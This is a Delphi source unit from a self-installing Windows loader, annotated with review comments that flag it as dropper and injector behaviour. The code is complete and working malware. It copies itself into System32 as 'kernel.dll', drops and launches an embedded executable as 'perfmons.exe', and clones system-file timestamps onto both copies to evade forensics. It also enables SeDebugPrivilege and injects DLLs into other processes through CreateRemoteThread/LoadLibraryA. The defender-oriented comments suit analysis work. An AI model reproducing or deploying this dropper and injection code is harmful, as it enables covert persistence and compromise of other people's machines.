// uMyProcess -- helper unit of a self-installing loader.  As written it:
//   1. copies its own executable into the System32 directory under two
//      names, one of them 'kernel.dll' (SaveToSystem32);
//   2. extracts an embedded EXE resource to System32\perfmons.exe, clones a
//      system file's timestamp onto it and starts it
//      (SaveProcessExeResourceToFile, RunMyProcess, MyThreadFunctiona);
//   3. can load a DLL into another process with a remote LoadLibraryA thread
//      (InjectDLL), after raising SeDebugPrivilege (EnabledDebugPrivilege).
// NOTE(review): this is loader/dropper/injector behaviour, not application
// logic.  The fixed artefact names above (System32\kernel.dll,
// System32\perfmons.exe) and the cross-process API sequence in InjectDLL are
// what a defender would hunt for.
unit uMyProcess;
interface
uses Classes, SysUtils, windows, TLHelp32, shellapi;
// Thread entry point: drops and starts perfmons.exe unless a process of that name is running.
function MyThreadFunctiona(P: pointer): Longint; stdcall;
// Remote-thread DLL injection into dwProcessId; True only means the remote thread ran.
function InjectDLL(dwProcessId: DWORD; strInjectDLL: string): boolean;
// Process id of the first process whose image name equals strExeName, 0 if none.
function FindTarget(strExeName: string): longint;
// System directory with trailing backslash.
function GetSysPath: string;
// Temp directory with trailing backslash.
function MyGetTempPath: string;
// Last-write time of a file as local TDateTime.
function MyGetFileTime(const Tf: string): TDateTime;
// Sets all three file times of FileName; returns a status string.
function MySetFileDateTime(FileName: string; TargetTime: TDateTime): string;
// Self-copy into System32 plus timestamp cloning.
procedure SaveToSystem32();
// Lower-cased file name (no directory) of the running executable.
function GetSelfExeName(): string;
// FileVersion string of dllName, '' on any error.
function GetDllFileVersion(dllName: string): string;
// Enables/disables SeDebugPrivilege on the current process token.
function EnabledDebugPrivilege(const Enabled: Boolean): Boolean;
var
// System32 path including the trailing backslash.  It is read by several
// routines below but never assigned in this unit -- presumably the caller
// fills it from GetSysPath before using them.
g_strSystem32Path: string;
implementation
// uVerInfo presumably provides TVerInfoRes, uLog provides logit(); neither is visible here.
uses uVerInfo, uLog;
function GetSelfExeName(): string;
var
  fullPath: string;
  lastSep: Integer;
begin
  // ParamStr(0) is the running executable with its full path.  Keep only
  // what follows the last backslash (the whole string when there is none)
  // and fold it to lower case.
  fullPath := ParamStr(0);
  lastSep := LastDelimiter('\', fullPath);
  Result := LowerCase(Copy(fullPath, lastSep + 1, MaxInt));
end;
// Installs a copy of the running executable into the System32 directory
// (g_strSystem32Path must already hold that path with a trailing backslash):
//   1. as 'kernel.dll' -- a name that resembles a system component;
//   2. under the executable's own file name.
// Each copy then receives the last-write time of an existing system file
// (comcat.dll / sndvol32.exe) so it does not stand out by timestamp.
// Return values of CopyFile and MySetFileDateTime are ignored.
// NOTE(review): self-copy into System32 plus timestamp cloning is
// persistence / anti-forensics behaviour; a non-Microsoft System32\kernel.dll
// is the artefact a defender would look for.
procedure SaveToSystem32();
var
strBackupDLLFile: string;
dt: TDateTime;
strSelfExePathAndName: string;
begin
strBackupDLLFile := g_strSystem32Path + 'kernel.dll';
// bFailIfExists = False: an existing file of that name is overwritten.
CopyFile(pchar(ParamStr(0)), pchar(strBackupDLLFile), false);
strSelfExePathAndName := g_strSystem32Path + GetSelfExeName();
CopyFile(pchar(ParamStr(0)), pchar(strSelfExePathAndName), false);
// Clone comcat.dll's last-write time onto the self-named copy ...
dt := MyGetFileTime(g_strSystem32Path + 'comcat.dll');
MySetFileDateTime(strSelfExePathAndName, dt);
// ... and sndvol32.exe's onto kernel.dll.
dt := MyGetFileTime(g_strSystem32Path + 'sndvol32.exe');
MySetFileDateTime(strBackupDLLFile, dt);
end;
function GetDllFileVersion(dllName: string): string;
var
  info: TVerInfoRes;
begin
  // Reads the FileVersion string of dllName through the uVerInfo helper.
  // Any Exception raised while opening or reading the version resource is
  // swallowed and '' is returned.  The helper is released in all cases;
  // Free on the nil placeholder is a no-op when Create itself failed.
  info := nil;
  try
    try
      info := TVerInfoRes.Create(dllName);
      Result := info.FileVersion;
    except
      on E: Exception do
        Result := '';
    end;
  finally
    info.Free;
  end;
end;
function CovFileDate(Fd: _FileTime): TDateTime;
var
  localTime: _FileTime;
  sysTime: _SystemTime;
begin
  // UTC FILETIME -> local FILETIME -> SYSTEMTIME -> TDateTime.
  // The results of the two Win32 conversion calls are not checked.
  FileTimeToLocalFileTime(Fd, localTime);
  FileTimeToSystemTime(localTime, sysTime);
  Result := SystemTimeToDateTime(sysTime);
end;
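function MyGetFileTime(const Tf: string): TDateTime;
var
  found: TSearchRec;
begin
  // Last-write time of Tf, converted to a local TDateTime by CovFileDate.
  // Returns 0 (the TDateTime epoch) when Tf cannot be found: the original
  // ignored FindFirst's result and read the uninitialised FindData of a
  // failed search.  The unused locals and the commented-out formatting
  // experiments have been dropped.
  Result := 0;
  if FindFirst(Tf, faAnyFile, found) = 0 then
  begin
    Result := CovFileDate(found.FindData.ftLastWriteTime);
    // SysUtils.FindClose, not Windows.FindClose: it takes the TSearchRec.
    SysUtils.FindClose(found);
  end;
end;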
// Sets creation, last-access and last-write time of FileName to TargetTime
// (a local TDateTime).  Returns a human-readable status string instead of a
// boolean; every caller in this unit ignores it.
function MySetFileDateTime(FileName: string; TargetTime: TDateTime): string;
var
FileHandle: HFile;
SystemTime: TSystemTime;
FileTime: TFileTime;
begin
DateTimeToSystemTime(TargetTime, SystemTime);
SystemTimeToFileTime(SystemTime, FileTime);
LocalFileTimeToFileTime(FileTime, FileTime); // convert local time to UTC before writing it to the file
FileHandle := FileOpen(FileName, fmOpenWrite or fmShareDenyNone); // fmOpenWrite maps to GENERIC_WRITE
// NOTE(review): whether '<= 0' catches a failed FileOpen depends on HFile
// being a signed type here (FileOpen reports failure as -1); with an
// unsigned HFile only a 0 handle is rejected -- confirm for this compiler
// version.  FileClose below runs on whatever handle was returned, in every
// branch.
if FileHandle <= 0
then
Result := 'Open File Error!!!'
else
// all three timestamps receive the same value
if not SetFileTime(FileHandle, @FileTime, @FileTime, @FileTime)
then
Result := 'Set File Time Error!!!'
else
Result := 'Set File Time Successfully!!!';
FileClose(FileHandle);
end;
function FindTarget(strExeName: string): longint;
var
  snapshot: THandle;
  entry: TProcessEntry32;
  entryName: string;
  more: BOOL;
begin
  // Walks the ToolHelp process snapshot and returns the id of the first
  // process whose image name equals strExeName (case-insensitive), or 0 if
  // there is none.  A failed snapshot simply yields an empty walk.
  Result := 0;
  snapshot := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  entry.dwSize := SizeOf(entry);
  more := Process32First(snapshot, entry);
  while more do
  begin
    entryName := entry.szExeFile;
    if AnsiSameText(entryName, strExeName) then
    begin
      Result := entry.th32ProcessID;
      Break;
    end;
    more := Process32Next(snapshot, entry);
  end;
  CloseHandle(snapshot);
end;
{ 设置权限 }
{ Enables (Enabled = True) or disables SeDebugPrivilege on the current
  process token.  Returns True only when GetLastError is ERROR_SUCCESS after
  AdjustTokenPrivileges; the function results of LookupPrivilegeValue and
  AdjustTokenPrivileges themselves are not checked.
  NOTE(review): SeDebugPrivilege is presumably requested before InjectDLL's
  OpenProcess (the call site is not in this unit).  A process with no
  debugging purpose enabling it is a strong privilege-use audit signal. }
function EnabledDebugPrivilege(const Enabled: Boolean): Boolean;
var
hTk: THandle; { token handle of the current process }
rtnTemp: Dword; { byte count returned by AdjustTokenPrivileges; unused }
TokenPri: TOKEN_PRIVILEGES;
const
SE_DEBUG = 'SeDebugPrivilege'; { privilege name to look up }
begin
Result := False;
{ open the process token with adjust rights only }
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hTk)) then
begin
TokenPri.PrivilegeCount := 1;
{ resolve the LUID of SeDebugPrivilege; failure is not detected here }
LookupPrivilegeValue(nil, SE_DEBUG, TokenPri.Privileges[0].Luid);
if Enabled then
TokenPri.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
else
TokenPri.Privileges[0].Attributes := 0;
rtnTemp := 0;
{ apply the attribute; GetLastError is ERROR_NOT_ALL_ASSIGNED when the
  account does not hold the privilege, which makes Result False }
AdjustTokenPrivileges(hTk, False, TokenPri, sizeof(TokenPri), nil, rtnTemp);
Result := GetLastError = ERROR_SUCCESS;
CloseHandle(hTk);
end;
end;
// Loads strInjectDLL into process dwProcessId with a remote LoadLibraryA
// thread:
//   OpenProcess -> VirtualAllocEx (path buffer) -> WriteProcessMemory
//   -> CreateRemoteThread(LoadLibraryA, buffer) -> WaitForSingleObject.
// Returns True when the remote thread was created and has finished.  The
// thread's exit code (LoadLibraryA's result) is read into TempVar but never
// examined, so True does not mean the DLL actually loaded.  Failures are
// written to the project log via logit (uLog).
// NOTE(review): this cross-process VirtualAllocEx / WriteProcessMemory /
// CreateRemoteThread sequence from a non-debugger process is the classic
// remote-thread injection pattern that endpoint telemetry keys on.
function InjectDLL(dwProcessId: DWORD; strInjectDLL: string): boolean;
var
hProcess: THandle;
dwSize, dwWritten: dword;
pszLibFileRemote: Pointer;
strDllName: string;
pfnStartAddr: TFNThreadStartRoutine;
TempVar: DWORD;
hRemoteThread: THANDLE;
begin
result := false;
strDllName := strInjectDLL; //;
// Only the access rights the technique needs: create thread, alloc, write.
hProcess := OpenProcess(PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or PROCESS_VM_WRITE, FALSE, dwProcessId);
if hProcess = 0 then
begin
result := false;
logit('OpenProcess error:GetLastError()=' + inttostr(GetLastError()));
exit;
end;
// Path length plus terminating NUL (assumes a pre-Unicode, single-byte
// Delphi string -- confirm for this compiler version).
dwSize := length(strDllName) + 1;
pszLibFileRemote := VirtualAllocEx(hProcess, nil, dwSize, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, pszLibFileRemote, pchar(strDllName), dwSize, dwWritten);
// Only the byte count is compared; the results of VirtualAllocEx and
// WriteProcessMemory themselves are not checked.
if dwWritten <> dwSize then
begin
VirtualFreeEx(hProcess, pszLibFileRemote, dwSize, MEM_DECOMMIT);
CloseHandle(hProcess);
logit('dwWritten <> dwSize');
exit;
end;
// The LoadLibraryA address is resolved in this process and handed to the
// target unchanged, i.e. the code assumes kernel32 sits at the same base in
// the target process; nothing here verifies that.
pfnStartAddr := GetProcAddress(GetModuleHandleA('Kernel32'), 'LoadLibraryA');
TempVar := 0;
hRemoteThread := CreateRemoteThread(hProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, TempVar);
if hRemoteThread <> 0 then
begin
// Wait for the remote LoadLibraryA call to return.
WaitForSingleObject(hRemoteThread, INFINITE);
// Exit code = LoadLibraryA's return value; stored in TempVar and never used.
GetExitCodeThread(hRemoteThread, TempVar);
CloseHandle(hRemoteThread);
result := true;
end
else
logit('CreateRemoteThread error:GetLastError()=' + inttostr(GetLastError()));
// MEM_DECOMMIT releases the pages but leaves the address range reserved.
VirtualFreeEx(hProcess, pszLibFileRemote, dwSize, MEM_DECOMMIT);
CloseHandle(hProcess);
end;
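function GetSysPath: string;
var
  buf: string;
  n: UINT;
begin
  // Windows system directory (GetSystemDirectory) with a trailing backslash,
  // or '' when the call fails.  The original ignored the return value and
  // ran StrLen over an uninitialised 256-byte buffer on failure.
  Result := '';
  SetLength(buf, MAX_PATH);
  n := GetSystemDirectory(PChar(buf), MAX_PATH);
  if n > UINT(Length(buf)) then
  begin
    // Buffer too small: n is the required size including the terminator.
    SetLength(buf, n);
    n := GetSystemDirectory(PChar(buf), n);
  end;
  // n = 0 is failure; n still larger than the buffer means nothing usable
  // was copied.  Return '' rather than garbage in both cases.
  if (n = 0) or (n > UINT(Length(buf))) then
    Exit;
  SetLength(buf, n);
  Result := buf + '\';
end;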
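function MyGetTempPath: string;
var
  buf: string;
  n: DWORD;
begin
  // Temp directory (Windows.GetTempPath) guaranteed to end in a backslash,
  // or '' when the call fails.  The original indexed buf[nLen] without
  // checking nLen, so a failed call (nLen = 0) read buf[0], and a result
  // longer than the fixed 512-byte buffer was truncated to garbage.
  Result := '';
  SetLength(buf, MAX_PATH);
  n := Windows.GetTempPath(MAX_PATH, PChar(buf));
  if n > DWORD(Length(buf)) then
  begin
    // Buffer too small: n is the required size including the terminator.
    SetLength(buf, n);
    n := Windows.GetTempPath(n, PChar(buf));
  end;
  if (n = 0) or (n > DWORD(Length(buf))) then
    Exit;
  SetLength(buf, n);
  // GetTempPath normally already ends in '\'; only append when it does not.
  if buf[n] <> '\' then
    Result := buf + '\'
  else
    Result := buf;
end;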
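function GetFileSize(const FileName: string): LongInt;
var
  rec: TSearchRec;
begin
  // Size in bytes of FileName as reported by FindFirst, or -1 when it is
  // not found.  A successful FindFirst must be paired with FindClose; the
  // original never called it and leaked one search handle per call.
  if FindFirst(ExpandFileName(FileName), faAnyFile, rec) = 0 then
  begin
    Result := rec.Size;
    SysUtils.FindClose(rec);
  end
  else
    Result := -1;
end;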
// Extracts the resource with id 101 and type 'EXE' embedded in this module
// to System32\perfmons.exe and gives the file comcat.dll's last-write time.
// Result is never assigned, so the return value is undefined.  Any Exception
// is logged via logit and swallowed; the outer finally block is empty.
// NOTE(review): dropping an embedded executable into System32 and cloning a
// system file's timestamp onto it is dropper behaviour; 'perfmons.exe' is
// the artefact name.
function SaveProcessExeResourceToFile(): boolean;
var
rs: TResourceStream;
dt: TDateTime;
nSize: LongInt;
begin
nSize := -1;
logit(g_strSystem32Path);
// If a previous copy exists, record its size for the log line below only.
if FileExists(g_strSystem32Path + 'perfmons.exe') then
begin
nSize := GetFileSize(g_strSystem32Path + 'perfmons.exe');
end;
logit('FileExists');
try
try
// hInstance = this module; 101 / 'EXE' identify the embedded payload.
rs := TResourceStream.CreateFromID(hInstance, 101, 'EXE');
logit('System32 path:' + g_strSystem32Path);
logit('resource file size:' + inttostr(rs.Size) + ' real file size:' + inttostr(nSize));
// Overwrites any existing perfmons.exe; the sizes above are only logged.
RS.SaveToFile(g_strSystem32Path + 'perfmons.exe');
dt := myGetFileTime(g_strSystem32Path + 'comcat.dll');
MySetFileDateTime(g_strSystem32Path + 'perfmons.exe', dt);
except
on e: exception do
begin
logit('error:SaveProcessExeResourceToFile:' + e.Message);
end;
end;
// Runs even when CreateFromID raised, in which case rs was never assigned.
RS.Free;
finally
end;
end;
// Launches 'perfmons.exe' (the file dropped by SaveProcessExeResourceToFile)
// via ShellExecute, minimised and without taking focus.  The name carries no
// directory, so it relies on ShellExecute's lookup finding the copy placed
// in System32 -- not verified here.  Result is never assigned.
function RunMyProcess(): boolean;
begin
ShellExecute(0, 'open', pchar('perfmons.exe'), 0, 0, SW_SHOWMINNOACTIVE);
end;
// Thread entry point (stdcall; P is unused).  If no process named
// perfmons.exe is running, extracts it from the embedded resource and
// starts it.  Always returns 0.  objATOM and nSize are declared but unused.
// NOTE(review): the "already running" test is by image name only, so any
// process called perfmons.exe suppresses the drop.
function MyThreadFunctiona(P: pointer): Longint; stdcall;
var
objATOM: ATOM;
nSize, MyProcessId: longint;
begin
result := 0;
MyProcessId := FindTarget('perfmons.exe');
if MyProcessId <= 0 then
begin
SaveProcessExeResourceToFile();
RunMyProcess();
end;
// disabled call left in the original source:
// ////////////ProcessSelfProgram(FindTarget('notepad.exe'));
logit('MyThreadFunction --- ok!');
end;
end.